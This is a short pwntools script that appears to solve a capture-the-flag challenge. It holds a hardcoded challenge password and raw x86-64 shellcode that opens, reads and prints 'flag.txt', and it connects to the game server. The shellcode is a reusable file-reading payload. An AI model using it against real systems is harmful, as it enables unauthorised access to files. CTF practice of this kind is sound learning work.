from pwn import *


password = b"G00d_wh1sp3r!!"

HOST = ["game1.marshack.fr", 43003]

shellcode = b"\x48\xC7\xC0\x01\x01\x00\x00\x48\xBF\x9C\xFF\xFF\xFF\xFF\x00\x00\x00\x6A\x00\x48\xBE\x66\x6C\x61\x67\x2E\x74\x78\x74\x56\x48\x8D\x34\x24\x48\x31\xD2\x0F\x05\x50\x48\x83\xEC\x20\x48\x31\xC0\x48\x8B\x7C\x24\x20\x48\x89\xE6\x48\xC7\xC2\x20\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x48\x89\xE6\x48\xC7\xC2\x20\x00\x00\x00\x0F\x05"

payload = b''.join([
	password,
	shellcode
])

with open("payload", "wb") as f:
	f.write(payload)

p = connect(HOST[0], HOST[1]) 
p.readuntil(b">")
p.sendline(password)
print(p.recvall())
p.interactive()